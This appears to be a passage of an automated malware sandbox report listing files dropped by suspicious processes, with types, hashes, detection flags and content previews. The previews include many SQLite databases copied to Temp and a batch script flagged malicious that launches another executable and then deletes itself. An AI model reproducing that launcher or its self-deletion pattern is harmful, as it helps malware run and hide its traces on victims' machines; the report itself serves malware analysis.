                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\lmXqPxTfNHomnnafzTOKZnFns.exe.log

                                                                                            Download File
                                                                                            Process:C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):1281
                                                                                            Entropy (8bit):5.370111951859942
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                            C:\Users\user\AppData\Local\Temp\3ADQ97D0F6

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                            Category:dropped
                                                                                            Size (bytes):106496
                                                                                            Entropy (8bit):1.1358696453229276
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\9Kd4OkLc1n

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                            Category:dropped
                                                                                            Size (bytes):98304
                                                                                            Entropy (8bit):0.08235737944063153
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\DQpBYX8QRT

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                            Category:dropped
                                                                                            Size (bytes):40960
                                                                                            Entropy (8bit):0.8553638852307782
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\JbHkkNq0ir

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                            Category:dropped
                                                                                            Size (bytes):28672
                                                                                            Entropy (8bit):2.5793180405395284
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\K8BHrhuEP2

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):25
                                                                                            Entropy (8bit):4.483856189774723
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:3IoJNtTEyE:3VhgyE
                                                                                            MD5:53788CFC654E1A26F548E97835ED703B
                                                                                            SHA1:A488C0656F140846DEB2453E35AE6BF9D26BB9F8
                                                                                            SHA-256:A006712AF435969AA63A6E86036C6115663FD94893936A9278B693DDEEF69957
                                                                                            SHA-512:80361B5BACA1A652ED1588F719123D31B825A7418AAA5615F752191464C4BF3DC3FC1A08B0ED4BECB565387EBA95B0A9D4568779584E3362B5668FC1BB486AA3
                                                                                            Malicious:false
                                                                                            Preview:CwHmMlhLeY7w68cqjsoA4q20K

                                                                                            C:\Users\user\AppData\Local\Temp\KR0POkAyjk

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                            Category:dropped
                                                                                            Size (bytes):159744
                                                                                            Entropy (8bit):0.7873599747470391
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                            MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                            SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                            SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                            SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\MuSEgtWVgv

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                            Category:dropped
                                                                                            Size (bytes):114688
                                                                                            Entropy (8bit):0.9746603542602881
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\SY7qCo8sGX

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                            Category:dropped
                                                                                            Size (bytes):126976
                                                                                            Entropy (8bit):0.47147045728725767
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\XfESz4vSiA

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                            Category:dropped
                                                                                            Size (bytes):114688
                                                                                            Entropy (8bit):0.9746603542602881
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\e65pqCzUjZ.bat

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):185
                                                                                            Entropy (8bit):5.03236672359481
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:mKDDBEIFK+KdTVpM3No+HK9ATScyW+jn9m7a0ZBktKcKZG1t+kiE2J5xAIXwHoh:hITg3Nou11r+DE7aYKOZG1wkn23fXwHG
                                                                                            MD5:9EC904FC9D43E3D4684FDE40165766D5
                                                                                            SHA1:28406D16124B00AAD7E34E9611E01C4447523358
                                                                                            SHA-256:AA6508B184D1C13CF21AAD13ACBD5453C300B747A7CA393B095597FF467DF1EC
                                                                                            SHA-512:E74C18175C3A69EA7BAF7F45E6E6BC3E23B2D2161C4D5B408A1137F704AC63962E4E9EF2F26F7BC53A56280B15E25F7F4441295ED3EC108848268AEEE17E0095
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Recovery\upfc.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\e65pqCzUjZ.bat"

                                                                                            C:\Users\user\AppData\Local\Temp\lv5ZquHNsR

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                            Category:dropped
                                                                                            Size (bytes):20480
                                                                                            Entropy (8bit):0.5712781801655107
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\m4Li5wz734

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                            Category:dropped
                                                                                            Size (bytes):49152
                                                                                            Entropy (8bit):0.8180424350137764
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\rL05p88NW9

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                            Category:dropped
                                                                                            Size (bytes):40960
                                                                                            Entropy (8bit):0.8553638852307782
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\s826aptdcS

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                            Category:dropped
                                                                                            Size (bytes):106496
                                                                                            Entropy (8bit):1.1358696453229276
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\shw5FLmYQQ

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):14
                                                                                            Entropy (8bit):3.378783493486176
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Y2Qt6eYYn:Y2Qt6eYYn
                                                                                            MD5:6CA4960355E4951C72AA5F6364E459D5
                                                                                            SHA1:2FD90B4EC32804DFF7A41B6E63C8B0A40B592113
                                                                                            SHA-256:88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3
                                                                                            SHA-512:8544CD778717788B7484FAF2001F463320A357DB63CB72715C1395EF19D32EEC4278BAB07F15DE3F4FED6AF7E4F96C41908A0C45BE94D5CDD8121877ECCF310D
                                                                                            Malicious:false
                                                                                            Preview:{"Surveys":{}}

                                                                                            C:\Users\user\AppData\Local\Temp\t9XJmGYMM8

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                            Category:dropped
                                                                                            Size (bytes):20480
                                                                                            Entropy (8bit):0.5707520969659783
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\tzsK1wUJNk

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                            Category:dropped
                                                                                            Size (bytes):5242880
                                                                                            Entropy (8bit):0.037963276276857943
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\vfcavioUjp

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                            Category:dropped
                                                                                            Size (bytes):20480
                                                                                            Entropy (8bit):0.5707520969659783
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\zecl7NjtXv

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):25
                                                                                            Entropy (8bit):4.1834651896016455
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:LePJpclj:LEgj
                                                                                            MD5:0A9AD878523934C83A6DE91D667D0C76
                                                                                            SHA1:E94FBEB0DD41436812F111CD672FD25082AF7E14
                                                                                            SHA-256:1074C62A23B986E658C8909F77036240178C2838A25222306C5F8514068F85D7
                                                                                            SHA-512:1EADD4E52880516DFF818C5EFB8FFFD448813EF7C9991CB16232CF52C0FAFC888AB361E1693763BFD966601B85E70A9A0EE678872EF7400B63167048A18CF865
                                                                                            Malicious:false
                                                                                            Preview:SFGKKmbH8lPFfFcVHLgKxNhMA

                                                                                            C:\Windows\LiveKernelReports\WinStore.App.exe

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Windows\LiveKernelReports\fd168b19609dff

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with very long lines (912), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):912
                                                                                            Entropy (8bit):5.913594587698791
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:s78QYUA4R+k8OIHJ/vYClmulw6GqTAzgOsAfF:s4jvSZ8zYslw6BlOs8
                                                                                            MD5:AB7665AFFCB5F3F16093D16A1A4C79F2
                                                                                            SHA1:C4CAC7F3D7688C38BFC0E0B2CD537903B5236AD1
                                                                                            SHA-256:92F38E9D1ED783EFB3F94F7B9A3E3010100853C5097A840502C082C60081FD47
                                                                                            SHA-512:EAB83B63E22EF072AD9E3D73A0FE0B02D6E668CD19C5EB779FC72AE251D6CE01F98050AF01B11D8664496A5240F775125AE83A50B77FD0C109459CD164B061DD
                                                                                            Malicious:false
